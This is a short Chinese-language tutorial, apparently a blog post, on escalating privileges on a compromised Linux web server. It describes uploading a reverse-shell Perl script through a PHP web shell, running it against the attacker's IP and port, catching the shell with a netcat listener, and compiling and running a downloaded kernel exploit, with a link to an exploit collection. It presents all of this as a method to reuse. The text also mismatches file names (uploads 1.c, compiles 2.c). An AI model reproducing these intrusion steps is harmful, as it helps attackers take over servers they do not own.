先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0

linux溢出提权

然后执行 ./1.pl 本机IP 1224

接着本机监听nc -vv -l -p 1224,图1 反弹成功

linux溢出提权

输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE

找对应的exp, 这里地址整理很齐全可以这里下
http://bbs.tian6.com/linux_exp/index.htm 

命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传1.c
然后命令输入
Gcc –o 2 2.c  //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2

linux溢出提权

看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的。

相关文章:

  • 2021-06-25
  • 2021-08-12
  • 2021-07-19
  • 2022-12-23
  • 2022-12-23
  • 2021-09-12
  • 2021-10-25
  • 2022-01-20
猜你喜欢
  • 2022-12-23
  • 2021-05-27
  • 2022-12-23
  • 2022-01-08
  • 2021-10-21
  • 2021-11-12
  • 2021-08-02
相关资源
相似解决方案